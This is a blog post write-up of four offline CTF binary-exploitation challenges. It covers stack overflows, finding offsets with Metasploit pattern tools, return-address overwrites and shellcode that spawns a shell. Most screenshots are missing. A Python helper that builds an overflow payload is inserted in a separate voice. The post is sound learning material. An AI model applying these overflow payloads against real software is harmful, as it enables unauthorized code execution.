Saturday, 27 May 2017

Playing offline CTFs

In the meantime I started some new exercises related to CTF adventures. This time I tried to pass a few challenges in the “binary pwn” category. A few cases are described below.

First of all, my environment: to solve all of these cases I used Windows 10 running Kali Linux 2.0 in VirtualBox. I found the challenges here. I decided to check them one by one, starting from this archive: /2004/Defcon-Quals/2004-quals.tgz.



Case #01: stage2



Ok, now we will use objdump:



Ok, so now.

I created a pattern using the pattern_create tool from Metasploit. The pattern was used as argv[1] of our stage2 application:


Enter. …and we are here:




Let’s find our offset using pattern_offset from Metasploit again:



Ok, so it looks like our overflow needs 104 characters to trigger. Verifying:




Great. Let’s go deeper. I found a nice (19-byte) shellcode on exploit-db.com (thanks!). Let’s try to use it in our attack:


So, hm. Yes. Here we are:

:]


Case #02: from Easy CTF 2017

You can find more about EasyCTF here. I found the resources (the so-called ‘problems’) at this location: https://github.com/EasyCTF/easyctf-2017-problems

Like before, I was interested ‘only’ in those challenges where we need to exploit some kind of vulnerability. That’s how I found the simple-rop challenge.




Let’s get to work. For testing/learning purposes I created a ‘flag.txt’ file in the same directory where simple-rop.c was compiled:



Ok, flag.txt is ready and the app is compiled, but comparing the output of objdump and gdb, you will spot one missing line:




Let’s try to complete the task. The idea here is to ‘read the flag’. Let’s disassemble print_flag in gdb:




Generating a pattern (pattern_create 100), we will try to overflow our buffer (we know from the source that buff is a 64-byte char array). Trying:



Ok, it crashed. After a while we will see that the right payload is 76 bytes of ‘A’ followed by the address of print_flag. Let’s try it:




Cool. ;]
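As an added example (my own code, not the author’s and not Metasploit’s), here is a small Python re-implementation of the pattern_create / pattern_offset logic used in cases #01 and #02, plus the padding-then-address payload layout of case #02. The print_flag address 0x08048474 it uses is a made-up placeholder, not the one from the challenge.

```python
# Added example: a re-implementation of the Metasploit pattern_create /
# pattern_offset logic from cases #01 and #02, not the author's code.
import string
import struct


def pattern_create(length: int) -> bytes:
    """Non-repeating pattern of `length` bytes: Aa0Aa1...Aa9Ab0... (upper, lower, digit)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += f"{u}{l}{d}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # 20280 bytes is the maximum before the pattern would repeat


def pattern_offset(value, length: int = 20280):
    """Offset of `value` inside the pattern, or None if it is not part of it.

    `value` is the raw 4 bytes, or the crashed EIP as gdb shows it (an int or a
    hex string such as "0x35644134"); ints are tried in both byte orders.
    """
    pat = pattern_create(length)
    if isinstance(value, str):
        value = int(value, 16)
    if isinstance(value, int):
        candidates = [struct.pack("<I", value), struct.pack(">I", value)]
    else:
        candidates = [bytes(value)]
    for cand in candidates:
        idx = pat.find(cand)
        if idx != -1:
            return idx
    return None


def build_payload(offset: int, ret_addr: int) -> bytes:
    """Case #02 layout: `offset` bytes of padding, then a 32-bit little-endian address."""
    return b"A" * offset + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    pat = pattern_create(200)
    eip = struct.unpack("<I", pat[104:108])[0]  # what EIP holds after the stage2 crash
    print(hex(eip), pattern_offset(eip))        # -> 0x35644134 104
    # 0x08048474 is a made-up placeholder for the print_flag address seen in gdb
    print(build_payload(76, 0x08048474).hex())
```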
Next.



Case #03: doubly-dangerous, also from EasyCTF 2017:

It was a little surprise for me when I saw the fxch instruction in the assembly (afaik possibly some other variants too) ;] Anyway... let's try it:




As we can read at the link:

 


Ok. As you can see, our goal is to get the variable modified equal to 11.28125; see line 39:



(...) 39    if (modified == 11.28125) {

…then we will run the give_flag() function (and hopefully our modified shell). Let’s get to work. In the next step we can see that our content is almost ready:






Then we continue:






Now, because we know that we need to compare those two ‘strings’ (st1, st2), we can also check the value we need to compare against:



So far so good. Playing a little bit with the lengths…

…and we’re here:

Ok.


Case #04: overflow1.c from EasyCTF 2014:

I copied my flag.txt from EasyCTF 2017 (case #03 above). Now it looks like this:



I assume that we need 0xc0deface as the secret value. Then we will run a shell. Let’s try:

Ok, looks cool. Assuming that we know how to set up our shellcode, we can now proceed with the new shell:

See you next time ;]
Cheers.



